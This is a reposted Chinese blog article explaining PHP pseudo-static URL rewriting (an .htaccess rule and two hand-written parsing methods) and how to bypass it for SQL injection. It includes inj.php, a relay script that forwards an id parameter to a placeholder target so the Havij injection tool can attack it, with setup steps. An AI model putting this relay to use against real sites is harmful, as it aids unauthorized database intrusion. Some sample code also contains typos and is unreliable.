PHP 伪静态技术原理以及突破原理实现介绍

最新推荐文章于 2021-07-21 22:43:47 发布
转载 最新推荐文章于 2021-07-21 22:43:47 发布 · 573 阅读 · 0

本文介绍如何通过构造中间注入页面来突破伪静态技术,并提供三种PHP伪静态实现方法,包括利用Apache服务器功能、编码实现等。

伪静态技术比较好突破,需要自己构造中转注入页面;伪静态技术原理都很简单,就是把原来的 index.php?id=1 这种形式的URL给替换成其它形式

先说实现方法:
inj.php:

<?php
set_time_limit(10);
$id = $_GET["id"];
$id = str_replace(" ", "%20", $id);
$id = str_replace("=", "%3D", $id);
$url = "http://www.xxx.com/index.php/library/more/id/$id.html";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //启用时将curl_init()获取的信息以文件流的形式返回,而不是直接输出
curl_setopt($ch, CURLOPT_HEADER, 0); //启用时会将头文件的信息作为数据流输出
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

用wamp搭建一个服务器,把上面inj.php放到wamp/www/中,然后在Havij中跑 http://127.0.0.1/inj.php?id=1

PHP伪静态实现方法一(利用Apache 服务器的功能)
1、检查Apache是否支持mod_rewrite
2、让Apache 支持.htaccess
3、建立.htaccess文件
4、规则:
RewriteEngine on
RewriteRule ([a-zA-Z]{1,})-([0-9]{1,}).html$index.php?action=$1&id=$2
([a-zA-Z]{1,})-([0-9]{1,}) 是 URL长啥样
$1 是([a-zA-Z]{1,}) 所匹配的
$2 是[0-9]{1,} 所匹配的
比如说:www.xx.com/page-18.html
真实的URL如下:
action = page
id = 18

PHP伪静态实现方法二(编码实现)
$Php2Html_FileUrl = $_SERVER[“REQUEST_URI”]
echo $Php2Html_FileUrl
例子:// localhost/php100/test.php?id|1@action|2

代码如下:

$Php2Html_UrlString = str_replace("?", "", str_replace("/", "", strrchr(strrchr($Php2Html_FileUrl, "/"), "?"))))
/*
内层的strrchr出来:/test.php?id|1@action|2
外层的strrchr出来:id|1@action|2
内层的str_replace出来:把 / 号去掉,本例子 没有
外层的str_replace出来:把 ?号去掉,本例子 没有
*/
$Php2Html_UrlQueryStrList = explode("@", $Php2Html_UrlString);
/*把str变成以@为界限划分的数组:id|1 和 action|2*/
foreach ($Php2Html_UrlQueryStrList as $Php2Html_UrlQueryStr) {
	$Php2Html_TmpArray = explode("|", $Php2Html_UrlQueryStr);
	/* id => 1 和 action => 2*/
	$_GET[$Php2Html_TmpArray[0]] = $Php2Html_TmpArray[1];
}

PHP伪静态实现方法三(编码实现)
例子: localhost/php100/test.php/1/2

代码如下:

$filename = basename($_SERVER["SCRIPT_NAME"]);
echo $_SERVER["SCRIPT_NAME"];
echo $filename;
if (strtolower($filename) == 'test.php') {
	if (!empty($_GET[id])) {
		$id = intval($_GET[id]);
		echo $id;
		$action = intval($_GET[action]);
		echo $action;
	} else {
		$nav = $_SERVER["REQUEST_URI"];
		$script = $_SERVER["SRCIPT_NAME"];
		//这句话应该是把URL前面那段给搞掉。。剩下 "1/2"之类的。。
		$nav = ereg_replace("$script", "", urldecode($nav));
		echo $nav;
		$vars = explode("/", $nav);
		print_r($vars);
		$id = intval($vars[1]);
		$action = intval($vars[2]);
	}
	echo $id . '&' . $action;
}

总结下:
(1)伪静态技术比较好突破,需要自己构造中转注入页面。
(2)伪静态技术原理都很简单,就是把原来的 index.php?id=1 这种形式的URL给替换成其它形式。


原文地址:http://www.xz-src.com/1951.html

伪静态注入中转突破伪静态
07-24
伪静态注入中转突破伪静态,可以学习一下啊,比较全面了
伪静态注入中转
10-06
伪静态注入中转PHP版本 土司出品 方便大家测试使用
学习札记——伪静态技术(较完整篇)
weixin_30635053的博客
06-01 159
伪静态技术产生的背景: 1、静态网页与动态比较: 1)静态网页: 优势:A、 对搜索引擎友好,被收录的质量高;B、访问速度快;C、资源(cpu 等)占用少。 劣势:A、对于大型门户,或者社区来说,不断的修改将会产生大量I/O,会导致磁盘出现碎片甚至出现磁盘坏道。相当恐怖一个隐患。用户信息一旦没有了就没戏玩了。B、储存空间占用会多一些。 2)动态网页: 优...
apeach和php合作原理,PHP 伪静态技术原理以及突破原理实现介绍
weixin_36070282的博客
03-10 212
先说实现方法:inj.php:set_time_limit(10);$id=$_GET["id"];$id=str_replace(" ","%20",$id);$id=str_replace("=","%3D",$id);$url="http://www.xxx.com/index.php/library/more/id/$id.html";$ch=curl_init();curl_setopt...
PHP 伪静态技术
u010194859的专栏
12-05 732
下面是生成伪静态地址和逆转伪静态地址的两个函数,这两个函数在相应的位置引用就可以实现将http://www.zhongya.cn/certificate_page.php?clid=22转成这样的http://www.zhongya.cn/certificate_page.php/clid_22.htm形式。 /****************************** 使用参考: 将
艺帆简洁家具网站源码支持批量上传与伪静态
其次是“全站伪静态”技术的应用,即将原本带有动态参数的URL(如index.asp?id=1)转化为.html等静态格式(如product-1.html),不仅提升了网址美观度,更重要的是优化了搜索引擎抓取机制,增强SEO效果,提高百度、...
IIS6伪静态与安全性:9个策略保护网站免受攻击
通过分析伪静态的工作原理和SEO优势,本文阐述了伪静态的核心机制及其对用户体验和性能的影响。同时,文章深入研究了IIS6的安全架构、认证授权机制以及如何通过定期更新和最佳权限设置来提高网站安全性。针对常见的...
基于PHP的小偷采集系统实现天涯易读程序
此外,程序还特别强调了SEO优化方面的设计——采用伪静态技术。所谓伪静态,是指URL表面上呈现为.html等静态格式(如/thread-12345.html),但实际上仍由PHP动态脚本处理请求。这种技术既保留了动态程序的灵活性,又...
PHP 伪静态技术原理以及突破原理
要不,单步调试走起?
07-12 5076
先说实现方法: inj.php: <?php set_time_limit(10); $id=$_GET["id"]; $id=str_replace(" ","%20",$id); $id=str_replace("=","%3D",$id); $url="http://www.xxx.com/index.php/library/more/id/$id.html"; $ch=curl_ini
PHP伪静态原理及极简实现
五侠的博客
07-21 1707
PHP伪静态原理及极简实现目的原理极简实现框架实现 目的 伪静态可以隐藏后端实现原理,便于搜索引擎收藏,开起来高大上一些。 原理 通过nginx路径重写跳转到后端,再分发到控制器。 极简实现 为了简单,以nginx和php-fpm的方式部署项目,网站根目录就两个文件: helpers.php,其中存放各种函数 index.php,用于提取路由并分发到函数中 适合功能非常简单,没必要使用框架的情况。 第一步:配置nginx location / { try_files $uri $uri/ /inde
php伪静态原理,Discuz!伪静态原理分析
weixin_39768247的博客
03-11 325
伪静态在SEO火热的时代,是每个站长都比较关注的问题,Discuz!论坛如何伪静态,为什么伪静态失效了,为什么列表页无法实现伪静态,为什么有些页面不是伪静态呢?下面dz官方nxy105从两个角度入手为大家分析下discuz!X2是如何实现伪静态功能。第一、Discuz!伪静态是如何作用的我们都知道,当我们通过地址访问一个页面的时候,访问的是服务器上的一个实体文件。例如,访问http://www....
php实现伪静态以及定义原理
Sunsaisai的博客
11-30 3358
伪静态是什么:网站分为动态网站和静态网站,我们常见的以html结尾的一般都是静态页面,以.php.asp结尾的页面一般是动态网站,动态网站是有和数据库进行交互才被称为动态网站,动态网站由于不容易被搜索引擎搜录所以才有了伪静态这么一说,伪静态顾名思义就是假的静态网站,也就是说动态网站为了方便被搜索引擎收录,利用服务器的rewirte实现的假静态的过程。 首先说明一下伪静态的好处好不足之处, 好处...
php 伪静态页面的实现
堆码,堆出一片天
04-06 1122
所谓伪静态页面指得是 http://host/index.php/module/sub/action/1.html 类似于这样的url生成的页面。使用伪静态页面的好处就是网站的页面可以被搜索引擎的爬虫更快的抓取。php 使用伪静态页面的关键就是对 $_SERVER[PATH_INFO] 变量的分析,对于 http://host/index.php/module/sub/action/1.htm
php怎么伪静态页面,php怎么实现网页伪静态
weixin_32126033的博客
04-11 453
php实现网页伪静态的方法:首先在服务器根目录创建一个“.htaccess”文件;然后添加内容为“RewriteRule ^index-(\d+)\.html$ index.php?id=$1”即可。本文操作环境:Windows7系统、PHP7.1版,DELL G3电脑.htaccess实现php网站伪静态,百分百可用!伪静态是啥?很简单,就是假的静态网页...例如有个网页是:www.xxx.co...
伪静态技术
aaa333qwe的博客
05-08 709
http://bbs.itcast.cn/thread-82858-1-1.html?xhw一、何为“伪静态”?       以传智播客bbs论坛为例,这篇帖子的链接地址原本应该是“http://bbs.itcast.cn/forum.php?mod=post&amp;action=newthread&amp;fid=181”,拼接好多参数,是不是看了之后“头疼”?不仅不好看,从seo的角度考虑,...
基于php伪静态实现详细介绍
luyaran的博客
09-16 686
1.根据$_SERVER['PATH_INFO']来操作实现。    举个列子比如你的网站的地址是 http://127.0.0.1/show_new.php/look-id-1.shtml 你echo $_SERVER['PATH_INFO'] 出来的结果就会是 /look-id-1.shtml 看到这个我想大家可能已经明白了。 完整的demo index.php 复制代码 代码如
伪静态及其原理实现
gscaiyucheng的专栏
12-26 2749
伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术。  伪静态的生成的2种方式:   1,框架型伪静态,这种是非常简单而且也是非常便于识别的,它的原理比较简单,就是做
Discuz!伪静态原理分析
sb___itfk的专栏
03-11 1012
第一、Discuz!伪静态是如何作用的 我们都知道,当我们通过地址访问一个页面的时候,访问的是服务器上的一个实体文件。例如,访问 http://www.xxx.com/index.html,访问的是网站根目录下的index.html文件。然而,对于论坛,如果每一个页面(主题列表,内容页)都是一个静态的实体文件,那文件的数量将何其之多,并且不能动态的实 时的展现论坛的内容。如果仅仅使用动态访问
C++静态库实现透视自瞄原理教程
标题中提到的“C++透视自瞄原理学习”和描述中涉及的“静态库”,“画框画线绘制文字”,“ImGui”,“创建透明窗口”,“内存搜索特征码”,以及“获取进程ID”等知识点,这些都是C++编程中较为高级和特定的功能。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值